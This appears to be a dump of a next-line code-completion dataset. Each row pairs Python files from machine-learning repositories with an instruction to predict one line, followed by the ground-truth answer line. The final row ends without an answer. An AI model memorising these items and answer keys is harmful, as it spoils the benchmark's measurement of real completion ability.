prompt: string, lengths 1.74k to 34.3k
ref: string, lengths 4 to 432
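Each row pairs a long repository-context prompt with the single ground-truth next line. A minimal sketch of iterating the two columns with the Hugging Face `datasets` library follows; the Hub identifier used here is a hypothetical placeholder, since the dataset's actual name does not appear in this dump.

```python
# Minimal sketch: reading the prompt/ref columns of a two-column dataset.
# The Hub identifier below is a hypothetical placeholder, not the real name.
from datasets import load_dataset

ds = load_dataset("your-org/next-line-prediction", split="train")

for row in ds.select(range(3)):
    prompt = row["prompt"]  # repository context plus the truncated current file
    ref = row["ref"]        # the single ground-truth next line
    print(f"prompt chars: {len(prompt)}, ref: {ref!r}")
```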
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: OPPOMKLab/u-LLaVA # Path: utils/registry.py class Registry: def register_builder(cls, name): def wrap(builder_cls): def register_model(cls, name): def wrap(model_cls): def register_processor(cls, name): def wrap(processor_cls): def register_collator(cls, name): def wrap(collator_cls): def register_task(cls, name): def wrap(task_cls): def register(cls, name, obj): def get_builder_class(cls, name): def get_model_class(cls, name): def get_processor_class(cls, name): def get_collator_class(cls, name): def get_task_class(cls, name): def list_models(cls): def list_processors(cls): def list_collators(cls): def list_builders(cls): def list_tasks(cls): def get_path(cls, name): def get(cls, name, default=None, no_warning=False): def unregister(cls, name): # Path: tasks/base_task.py class BaseTask: def __init__(self, cfg): self.cfg = cfg @staticmethod def build_model(model_cfg): model_cls = registry.get_model_class(model_cfg.arch) return model_cls.from_config(model_cfg) def build_collator(self, pad_token_id): """ :param pad_token_id: tokenizer.pad_token_id :return: data collator """ collator_type = self.cfg.get('collator_type', 'base_collator') data_collator = registry.get_collator_class(collator_type)(pad_token_id) return data_collator @staticmethod def build_processors(processors_cfg): """ :param processors_cfg: processor: clip_image: path: image_size: 224 video_train: n_frm: 8 image_size: 224 gif_train: n_frm: 8 image_size: 224 plain_box: precision: 3 :return: """ processors = dict() for idx, name in enumerate(processors_cfg): datetime_print('BUILDING PROCESSOR {0}: {1}'.format(idx + 1, name)) processor_cfg = processors_cfg[name] processor = registry.get_processor_class(name).from_config(processor_cfg) processors[name] = processor return processors @staticmethod def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'): """ Build a dictionary of datasets, keyed by split 'train', 'valid', 'test'. :param datasets_config: dataset_1 image_dir dataset_2 image_dir :param tokenizer: :param processor_dict: {'clip_image': CLIPImageProcessor()} :param conv_type: 'conv_simple' Returns: Dictionary of torch.utils.data.Dataset objects by split. datasets: { 'llava_instruct': {'train': dataset, 'test': dataset}, 'para_instruct': {'train': dataset, 'test': dataset} } """ datasets = dict() assert len(datasets_config) > 0, "At least one dataset has to be specified." 
for name in datasets_config: dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) dataset = builder.build(tokenizer, processor_dict, conv_type) datasets[name] = dataset return datasets # Path: utils/tools.py def datetime_print(msg): print('[' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")[:-3] + '] ' + msg) # Path: datasets/datasets/concat_dataset.py class ConcatDataset(Dataset): def __init__(self, datasets: Sequence[BaseDataset]): self.concat_dataset = TorchConcatDataset(datasets) def __len__(self): return len(self.concat_dataset) def __getitem__(self, index): return self.concat_dataset[index] # Path: datasets/datasets/concat_dataset.py class ConcatDatasetWithShuffle(Subset): def __init__(self, datasets: Sequence[BaseDataset], seed=42, portion=1): self.seed = seed self.portion = portion dataset = TorchConcatDataset(datasets) target_len = int(len(dataset) * portion) indices = list(range(len(dataset))) * int(np.ceil(portion)) rng = np.random.default_rng(seed) rng.shuffle(indices) indices = indices[:target_len] super().__init__(dataset, indices) # Path: tasks/image_text_pretrain.py from utils.registry import registry from tasks.base_task import BaseTask from utils.tools import datetime_print from datasets.datasets.concat_dataset import ConcatDataset, ConcatDatasetWithShuffle """ Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py """ @registry.register_task("image_text_pretrain") class ImageTextPretrainTask(BaseTask): def __init__(self, cfg): super().__init__(cfg) @staticmethod def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'): """ :param datasets_config: :param tokenizer: :param processor_dict: {'clip_image': CLIPImageProcessor()} :param conv_type: :return: """ assert len(datasets_config) > 0, "At least one dataset has to be specified." if len(datasets_config) == 1: name = list(datasets_config.keys())[0] dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) # {"train": dataset, "test": dataset} dataset = builder.build(tokenizer, processor_dict, conv_type) else: shuffle = True portion = 1 dataset_list = [] for idx, name in enumerate(datasets_config): datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name)) dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) current_dataset = builder.build(tokenizer, processor_dict, conv_type) dataset_list.append(current_dataset) if shuffle: dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion) else:
dataset = ConcatDataset(dataset_list)
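Every prompt ends with the same instruction: emit exactly one line and nothing else. One plausible way to score a model output against `ref`, under the assumption (mine, the dump specifies no official metric) that the intended measure is exact match after whitespace normalization:

```python
def score_prediction(prediction: str, ref: str) -> bool:
    """Assumed metric (no official one is stated in this dump): exact
    match on the first predicted line after stripping surrounding
    whitespace."""
    lines = prediction.strip().splitlines()
    first_line = lines[0] if lines else ""
    return first_line.strip() == ref.strip()

# Against the row above, a model emitting
# "dataset = ConcatDataset(dataset_list)\n" scores True.
print(score_prediction("dataset = ConcatDataset(dataset_list)\n",
                       "dataset = ConcatDataset(dataset_list)"))
```

A softer metric such as token-level edit distance would also fit; exact match is simply the most direct reading of the one-line requirement stated in each prompt.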
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: shashikg/WhisperS2T # Path: whisper_s2t/audio.py def pad_or_trim(array, length: int = N_SAMPLES, *, axis: int = -1): """ Pad or trim the audio array to N_SAMPLES, as expected by the encoder. """ if torch.is_tensor(array): if array.shape[axis] > length: array = array.index_select( dim=axis, index=torch.arange(length, device=array.device) ) if array.shape[axis] < length: pad_widths = [(0, 0)] * array.ndim pad_widths[axis] = (0, length - array.shape[axis]) array = F.pad(array, [pad for sizes in pad_widths[::-1] for pad in sizes]) else: if array.shape[axis] > length: array = array.take(indices=range(length), axis=axis) if array.shape[axis] < length: pad_widths = [(0, 0)] * array.ndim pad_widths[axis] = (0, length - array.shape[axis]) array = np.pad(array, pad_widths) return array # Path: whisper_s2t/audio.py def audio_batch_generator(audio_files): return THREAD_POOL_AUDIO_LOADER.imap(load_audio, audio_files) # Path: whisper_s2t/audio.py def load_audio(input_file, sr=16000, return_duration=False): try: with wave.open(input_file, 'rb') as wf: if (wf.getframerate() != sr) or (wf.getnchannels() != 1): raise Exception("Not a 16kHz wav mono channel file!") frames = wf.getnframes() x = wf.readframes(int(frames)) except: with tempfile.TemporaryDirectory() as tmpdir: wav_file = f"{tmpdir}/tmp.wav" ret_code = os.system(f'ffmpeg -hide_banner -loglevel panic -i {input_file} -threads 1 -acodec pcm_s16le -ac 1 -af aresample=resampler={RESAMPLING_ENGINE} -ar {sr} {wav_file} -y') if ret_code != 0: raise RuntimeError("ffmpeg failed to resample the input audio file, make sure ffmpeg is compiled properly!") with wave.open(wav_file, 'rb') as wf: frames = wf.getnframes() x = wf.readframes(int(frames)) audio_signal = np.frombuffer(x, np.int16).flatten().astype(np.float32)/32768.0 audio_duration = len(audio_signal)/sr if return_duration: return audio_signal, audio_duration else: return audio_signal # Path: whisper_s2t/data.py import torch import numpy as np from tqdm import tqdm from .configs import * from .audio import pad_or_trim, audio_batch_generator, load_audio def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None): speech_duration = [end - start for start, end in start_ends] stitched_speech_segments = [] curr_seg = [0] curr_dur = speech_duration[0] idx = 1 while idx < len(start_ends): if curr_dur + speech_duration[idx] > max_len: stitched_speech_segments.append([start_ends[_] for _ in curr_seg]) curr_seg = [idx] curr_dur = speech_duration[idx] else: curr_dur += speech_duration[idx] curr_seg.append(idx) idx += 1 stitched_speech_segments.append([start_ends[_] for _ in curr_seg]) if max_silent_region is None: return stitched_speech_segments stitched_speech_segments_joined = [] for segs in stitched_speech_segments: _segs = [] curr_seg_start_time, curr_seg_end_time = segs[0] for i in range(1, len(segs)): if (segs[i][0] - curr_seg_end_time) >= max_silent_region: _segs.append((curr_seg_start_time, curr_seg_end_time)) curr_seg_start_time = segs[i][0] curr_seg_end_time = segs[i][1] _segs.append((curr_seg_start_time, curr_seg_end_time)) stitched_speech_segments_joined.append(_segs) return stitched_speech_segments_joined class WhisperDataset(torch.utils.data.Dataset): def 
__init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len, device="cuda", dta_padding=48000, without_timestamps=True, use_dynamic_time_axis=False): self.audio_files = audio_files self.lang_codes = lang_codes self.tasks = tasks self.initial_prompts = initial_prompts self.tokenizer = tokenizer self.device = device self.dta_padding = dta_padding self.without_timestamps = without_timestamps self.use_dynamic_time_axis = use_dynamic_time_axis self.max_initial_prompt_len = max_initial_prompt_len if type(audio_files[0]) == str: self.get_audio_signal = self._get_audio_signal_from_file else: self.get_audio_signal = self._get_audio_signal_from_array def _get_audio_signal_from_array(self, item): return self.audio_files[item] def _get_audio_signal_from_file(self, item):
return load_audio(self.audio_files[item])
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: chinhsuanwu/ifusion # Path: ldm/thirdp/psp/helpers.py def get_blocks(num_layers): if num_layers == 50: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=4), get_block(in_channel=128, depth=256, num_units=14), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 100: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=13), get_block(in_channel=128, depth=256, num_units=30), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 152: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=8), get_block(in_channel=128, depth=256, num_units=36), get_block(in_channel=256, depth=512, num_units=3) ] else: raise ValueError("Invalid number of layers: {}. Must be one of [50, 100, 152]".format(num_layers)) return blocks # Path: ldm/thirdp/psp/helpers.py class Flatten(Module): def forward(self, input): return input.view(input.size(0), -1) # Path: ldm/thirdp/psp/helpers.py class bottleneck_IR(Module): def __init__(self, in_channel, depth, stride): super(bottleneck_IR, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth) ) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth) ) def forward(self, x): shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut # Path: ldm/thirdp/psp/helpers.py class bottleneck_IR_SE(Module): def __init__(self, in_channel, depth, stride): super(bottleneck_IR_SE, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth) ) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth), SEModule(depth, 16) ) def forward(self, x): shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut # Path: ldm/thirdp/psp/helpers.py def l2_norm(input, axis=1): norm = torch.norm(input, 2, axis, True) output = torch.div(input, norm) return output # Path: ldm/thirdp/psp/model_irse.py from torch.nn import ( Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, Dropout, Sequential, Module, ) from ldm.thirdp.psp.helpers import ( get_blocks, Flatten, bottleneck_IR, bottleneck_IR_SE, l2_norm, ) # https://github.com/eladrich/pixel2style2pixel """ Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) """ class Backbone(Module): def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True): super(Backbone, self).__init__() assert input_size in [112, 224], "input_size should be 112 or 224" assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152" assert mode in ["ir", "ir_se"], "mode should be ir or ir_se" blocks = 
get_blocks(num_layers) if mode == "ir": unit_module = bottleneck_IR elif mode == "ir_se":
unit_module = bottleneck_IR_SE
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: wangzhecheng/SkyScript # Path: src/open_clip/factory.py def create_model_from_pretrained( model_name: str, pretrained: Optional[str] = None, precision: str = 'fp32', device: Union[str, torch.device] = 'cpu', jit: bool = False, force_quick_gelu: bool = False, force_custom_text: bool = False, force_image_size: Optional[Union[int, Tuple[int, int]]] = None, return_transform: bool = True, image_mean: Optional[Tuple[float, ...]] = None, image_std: Optional[Tuple[float, ...]] = None, cache_dir: Optional[str] = None, ): model = create_model( model_name, pretrained, precision=precision, device=device, jit=jit, force_quick_gelu=force_quick_gelu, force_custom_text=force_custom_text, force_image_size=force_image_size, cache_dir=cache_dir, require_pretrained=True, ) if not return_transform: return model image_mean = image_mean or getattr(model.visual, 'image_mean', None) image_std = image_std or getattr(model.visual, 'image_std', None) preprocess = image_transform( model.visual.image_size, is_train=False, mean=image_mean, std=image_std, ) return model, preprocess # Path: src/open_clip/factory.py def get_model_config(model_name): if model_name in _MODEL_CONFIGS: return deepcopy(_MODEL_CONFIGS[model_name]) else: return None # Path: src/open_clip/factory.py def get_tokenizer(model_name): if model_name.startswith(HF_HUB_PREFIX): tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):]) else: config = get_model_config(model_name) tokenizer = HFTokenizer( config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize return tokenizer # Path: src/open_clip/tokenizer.py class HFTokenizer: """HuggingFace tokenizer wrapper""" def __init__(self, tokenizer_name: str): from transformers import AutoTokenizer self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_name) def save_pretrained(self, dest): self.tokenizer.save_pretrained(dest) def __call__(self, texts: Union[str, List[str]], context_length: int = 77) -> torch.Tensor: # same cleaning as for default tokenizer, except lowercasing # adding lower (for case-sensitive tokenizers) will make it more robust but less sensitive to nuance if isinstance(texts, str): texts = [texts] texts = [whitespace_clean(basic_clean(text)) for text in texts] input_ids = self.tokenizer( texts, return_tensors='pt', max_length=context_length, padding='max_length', truncation=True, ).input_ids return input_ids # Path: src/open_clip/push_to_hf_hub.py import argparse import json import os import torch import safetensors.torch from pathlib import Path from tempfile import TemporaryDirectory from typing import Optional, Tuple, Union from huggingface_hub import ( create_repo, get_hf_file_metadata, hf_hub_download, hf_hub_url, repo_type_and_id_from_hf_id, upload_folder, list_repo_files, ) from huggingface_hub.utils import EntryNotFoundError from .factory import create_model_from_pretrained, get_model_config, get_tokenizer from .tokenizer import HFTokenizer """ Adapted from https://github.com/mlfoundations/open_clip. 
Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt """ try: _has_hf_hub = True except ImportError: _has_hf_hub = False try: _has_safetensors = True except ImportError: _has_safetensors = False # Default name for a weights file hosted on the Huggingface Hub. HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version HF_CONFIG_NAME = 'open_clip_config.json' def save_config_for_hf( model, config_path: str, model_config: Optional[dict] ): preprocess_cfg = { 'mean': model.visual.image_mean, 'std': model.visual.image_std, } hf_config = { 'model_cfg': model_config, 'preprocess_cfg': preprocess_cfg, } with config_path.open('w') as f: json.dump(hf_config, f, indent=2) def save_for_hf( model,
tokenizer: HFTokenizer,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Lavreniuk/EVP # Path: evp/models.py class UNetWrapper(nn.Module): def __init__(self, unet, use_attn=True, base_size=512, max_attn_size=None, attn_selector='up_cross+down_cross') -> None: super().__init__() self.unet = unet self.attention_store = AttentionStore(base_size=base_size // 8, max_size=max_attn_size) self.size16 = base_size // 32 self.size32 = base_size // 16 self.size64 = base_size // 8 self.use_attn = use_attn if self.use_attn: register_attention_control(unet, self.attention_store) register_hier_output(unet) self.attn_selector = attn_selector.split('+') def forward(self, *args, **kwargs): if self.use_attn: self.attention_store.reset() out_list = self.unet(*args, **kwargs) if self.use_attn: avg_attn = self.attention_store.get_average_attention() attn16, attn32, attn64 = self.process_attn(avg_attn) out_list[1] = torch.cat([out_list[1], attn16], dim=1) out_list[2] = torch.cat([out_list[2], attn32], dim=1) if attn64 is not None: out_list[3] = torch.cat([out_list[3], attn64], dim=1) return out_list[::-1] def process_attn(self, avg_attn): attns = {self.size16: [], self.size32: [], self.size64: []} for k in self.attn_selector: for up_attn in avg_attn[k]: size = int(math.sqrt(up_attn.shape[1])) attns[size].append(rearrange(up_attn, 'b (h w) c -> b c h w', h=size)) attn16 = torch.stack(attns[self.size16]).mean(0) attn32 = torch.stack(attns[self.size32]).mean(0) if len(attns[self.size64]) > 0: attn64 = torch.stack(attns[self.size64]).mean(0) else: attn64 = None return attn16, attn32, attn64 # Path: evp/models.py class TextAdapterDepth(nn.Module): def __init__(self, text_dim=768): super().__init__() self.fc = nn.Sequential( nn.Linear(text_dim, text_dim), nn.GELU(), nn.Linear(text_dim, text_dim) ) def forward(self, latents, texts, gamma): # use the gamma to blend n_sen, channel = texts.shape bs = latents.shape[0] texts_after = self.fc(texts) texts = texts + gamma * texts_after texts = repeat(texts, 'n c -> n b c', b=1) return texts # Path: depth/models_depth/model_vpd.py import torch import torch.nn as nn import torch.nn.functional as F from timm.models.layers import trunc_normal_, DropPath from mmcv.cnn import (build_conv_layer, build_norm_layer, build_upsample_layer, constant_init, normal_init) from omegaconf import OmegaConf from ldm.util import instantiate_from_config from evp.models import UNetWrapper, TextAdapterDepth # ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. # The deconvolution code is based on Simple Baseline. # (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py) # Modified by Zigang Geng ([email protected]). 
# ------------------------------------------------------------------------------ class VPDDepthEncoder(nn.Module): def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768, dataset='nyu' ): super().__init__() self.layer1 = nn.Sequential( nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1), nn.GroupNorm(16, ldm_prior[0]), nn.ReLU(), nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1), ) self.layer2 = nn.Sequential( nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1), ) self.out_layer = nn.Sequential( nn.Conv2d(sum(ldm_prior), out_dim, 1), nn.GroupNorm(16, out_dim), nn.ReLU(), ) self.apply(self._init_weights) ### stable diffusion layers config = OmegaConf.load('./v1-inference.yaml') if sd_path is None: config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt' else: config.model.params.ckpt_path = f'../{sd_path}' sd_model = instantiate_from_config(config.model) self.encoder_vq = sd_model.first_stage_model self.unet = UNetWrapper(sd_model.model, use_attn=False) del sd_model.cond_stage_model del self.encoder_vq.decoder del self.unet.unet.diffusion_model.out for param in self.encoder_vq.parameters(): param.requires_grad = False if dataset == 'nyu':
self.text_adapter = TextAdapterDepth(text_dim=text_dim)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: penghao-wu/vstar # Path: VisualSearch/model/owlvit/util/box_ops.py def box_cxcywh_to_xyxy(x): def box_xyxy_to_cxcywh(x): def box_iou(boxes1, boxes2): def generalized_box_iou(boxes1, boxes2): def masks_to_boxes(masks): # Path: VisualSearch/model/owlvit/util/misc.py class NestedTensor(object): def __init__(self, tensors, mask: Optional[Tensor]): self.tensors = tensors self.mask = mask def to(self, device, non_blocking=False): # type: (Device) -> NestedTensor # noqa cast_tensor = self.tensors.to(device, non_blocking=non_blocking) mask = self.mask if mask is not None: assert mask is not None cast_mask = mask.to(device, non_blocking=non_blocking) else: cast_mask = None return NestedTensor(cast_tensor, cast_mask) def record_stream(self, *args, **kwargs): self.tensors.record_stream(*args, **kwargs) if self.mask is not None: self.mask.record_stream(*args, **kwargs) def decompose(self): return self.tensors, self.mask def __repr__(self): return str(self.tensors) # Path: VisualSearch/model/owlvit/util/misc.py def interpolate(input, size=None, scale_factor=None, mode="nearest", align_corners=None): # type: (Tensor, Optional[List[int]], Optional[float], str, Optional[bool]) -> Tensor """ Equivalent to nn.functional.interpolate, but with support for empty batch sizes. This will eventually be supported natively by PyTorch, and this class can go away. """ if float(torchvision.__version__[:3]) < 0.7: if input.numel() > 0: return torch.nn.functional.interpolate( input, size, scale_factor, mode, align_corners ) output_shape = _output_size(2, input, size, scale_factor) output_shape = list(input.shape[:-2]) + list(output_shape) if float(torchvision.__version__[:3]) < 0.5: return _NewEmptyTensorOp.apply(input, output_shape) return _new_empty_tensor(input, output_shape) else: return torchvision.ops.misc.interpolate(input, size, scale_factor, mode, align_corners) # Path: VisualSearch/model/owlvit/util/misc.py def nested_tensor_from_tensor_list(tensor_list: List[Tensor]): # TODO make this more general if tensor_list[0].ndim == 3: # TODO make it support different-sized images max_size = _max_by_axis([list(img.shape) for img in tensor_list]) # min_size = tuple(min(s) for s in zip(*[img.shape for img in tensor_list])) batch_shape = [len(tensor_list)] + max_size b, c, h, w = batch_shape dtype = tensor_list[0].dtype device = tensor_list[0].device tensor = torch.zeros(batch_shape, dtype=dtype, device=device) mask = torch.ones((b, h, w), dtype=torch.bool, device=device) for img, pad_img, m in zip(tensor_list, tensor, mask): pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img) m[: img.shape[1], :img.shape[2]] = False else: raise ValueError('not supported') return NestedTensor(tensor, mask) # Path: VisualSearch/model/owlvit/segmentation.py import io import torch import torch.nn as nn import torch.nn.functional as F from collections import defaultdict from PIL import Image from .util import box_ops from .util.misc import NestedTensor, interpolate, nested_tensor_from_tensor_list from panopticapi.utils import id2rgb, rgb2id # ------------------------------------------------------------------------ # Deformable DETR # Copyright (c) 2020 SenseTime. All Rights Reserved. 
# Licensed under the Apache License, Version 2.0 [see LICENSE for details] # ------------------------------------------------------------------------ # Modified from DETR (https://github.com/facebookresearch/detr) # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # ------------------------------------------------------------------------ """ This file provides the definition of the convolutional heads used to predict masks, as well as the losses """ try: except ImportError: pass class DETRsegm(nn.Module): def __init__(self, detr, freeze_detr=False): super().__init__() self.detr = detr if freeze_detr: for p in self.parameters(): p.requires_grad_(False) hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0) self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim) def forward(self, samples: NestedTensor): if not isinstance(samples, NestedTensor):
samples = nested_tensor_from_tensor_list(samples)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ValdonVitija/crap # Path: crap/file_analyzer.py class PythonFileAnalyzer: def __init__(self, file_path: pathlib.Path): self.file_path = file_path self.imported_modules = set() def analyze(self): """ Analyzes the Python file and extracts the imported modules. """ code = self.file_path.read_text() tree = ast.parse(code) visitor = ImportsVisitor() visitor.visit(tree) self.imported_modules = visitor.imported_modules # Path: crap/virtual_env_checker.py class VirtualEnvChecker: def __init__(self): self.venv_indicators = { "linux": {"bin", "include", "lib", "pyvenv.cfg"}, "win32": {"Scripts", "Include", "Lib", "pyvenv.cfg"} } def is_likely_venv(self, path): """ Checks if the given path is likely to be a virtual environment. Args: path (str): The path to check. Returns: bool: True if the path is likely to be a virtual environment, False otherwise. """ platform = sys.platform indicators = self.venv_indicators.get(platform, set()) return all(os.path.exists(os.path.join(path, ind)) for ind in indicators) # Path: crap/package_usage_counter.py class PackageUsageCounter: def __init__(self): self.pack_counter = get_package_counter_dict() def increment_package_count(self, package): if package in self.pack_counter: self.pack_counter[package] += 1 def get_unused_packages(self, important_packages) -> List[str]: """ Returns a list of unused packages. A package is considered unused if its count is 0 and it is not in the list of important packages. Args: important_packages (List[str]): A list of important packages. Returns: List[str]: A list of unused packages. 
""" return [pkg for pkg, count in self.pack_counter.items() if count == 0 and pkg not in important_packages] # Path: crap/subprocesses.py def uninstall_package(package_name: str): """Uninstall a given package.""" execute_command_without_output(["pip3", "uninstall", "-y", package_name]) # Path: crap/subprocesses.py def pre_cleanup_with_ruff(path_): """ Pre cleanup with ruff """ execute_command_without_output(["ruff", "check", path_, "--fix"]) # Path: crap/subprocesses.py def reinstall_from_requirements() -> None: """Reinstall packages from requirements.txt.""" req_path = pathlib.Path(__file__).parent / "data" / "req.txt" execute_command_without_output( ["pip3", "install", "-r", req_path, "--no-cache-dir"] ) # Path: crap/subprocesses.py def freeze_into_requirements(): """Freeze current environment to requirements.txt.""" req_path = pathlib.Path(__file__).parent / "data" / "req.txt" try: with open(req_path, "w") as file_: subprocess.run(["pip3", "freeze"], stdout=file_) except Exception as ex: print(ex) # Path: crap/subprocesses.py def get_current_packages() -> set: """Get the current packages installed in the environment.""" process = subprocess.run(["pip3", "freeze"], capture_output=True, text=True) output = process.stdout.strip() packages = set(line.split("==")[0] for line in output.split("\n")) return packages # Path: crap/crap_manager.py import os import pathlib from typing import Set from tqdm import tqdm from crap.file_analyzer import PythonFileAnalyzer from crap.virtual_env_checker import VirtualEnvChecker from crap.package_usage_counter import PackageUsageCounter from crap.subprocesses import ( uninstall_package, pre_cleanup_with_ruff, reinstall_from_requirements, freeze_into_requirements, get_current_packages ) class CrapManager: __slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages") def __init__(self, path_: str): self.path_ = pathlib.Path(path_).absolute() self.venv_checker = VirtualEnvChecker() self.package_usage_counter = PackageUsageCounter() self.deleted_packages = set() def run(self): if not self.path_.exists(): raise FileNotFoundError("File/Dir not found") total_steps = 4 bar_width = 100 bar_color = 'red' with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar: self._process_path() pbar.update(1)
initial_packages = get_current_packages()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: worm128/AI-YinMei # Path: text-generation-webui/extensions/openai/typing.py class ChatCompletionRequest(GenerationOptions, ChatCompletionRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class ChatCompletionResponse(BaseModel): id: str choices: List[dict] created: int = int(time.time()) model: str object: str = "chat.completion" usage: dict # Path: text-generation-webui/extensions/openai/typing.py class CompletionRequest(GenerationOptions, CompletionRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class CompletionResponse(BaseModel): id: str choices: List[dict] created: int = int(time.time()) model: str object: str = "text_completion" usage: dict # Path: text-generation-webui/extensions/openai/typing.py class DecodeRequest(BaseModel): tokens: List[int] # Path: text-generation-webui/extensions/openai/typing.py class DecodeResponse(BaseModel): text: str # Path: text-generation-webui/extensions/openai/typing.py class EmbeddingsRequest(BaseModel): input: str | List[str] model: str | None = Field(default=None, description="Unused parameter. To change the model, set the OPENEDAI_EMBEDDING_MODEL and OPENEDAI_EMBEDDING_DEVICE environment variables before starting the server.") encoding_format: str = Field(default="float", description="Can be float or base64.") user: str | None = Field(default=None, description="Unused parameter.") # Path: text-generation-webui/extensions/openai/typing.py class EmbeddingsResponse(BaseModel): index: int embedding: List[float] object: str = "embedding" # Path: text-generation-webui/extensions/openai/typing.py class EncodeRequest(BaseModel): text: str # Path: text-generation-webui/extensions/openai/typing.py class EncodeResponse(BaseModel): tokens: List[int] length: int # Path: text-generation-webui/extensions/openai/typing.py class LoadLorasRequest(BaseModel): lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class LoadModelRequest(BaseModel): model_name: str args: dict | None = None settings: dict | None = None # Path: text-generation-webui/extensions/openai/typing.py class LogitsRequest(GenerationOptions, LogitsRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class LogitsResponse(BaseModel): logits: dict # Path: text-generation-webui/extensions/openai/typing.py class LoraListResponse(BaseModel): lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class ModelInfoResponse(BaseModel): model_name: str lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class ModelListResponse(BaseModel): model_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class TokenCountResponse(BaseModel): length: int # Path: text-generation-webui/extensions/openai/typing.py def to_dict(obj): return obj.__dict__ # Path: text-generation-webui/extensions/openai/script.py import asyncio 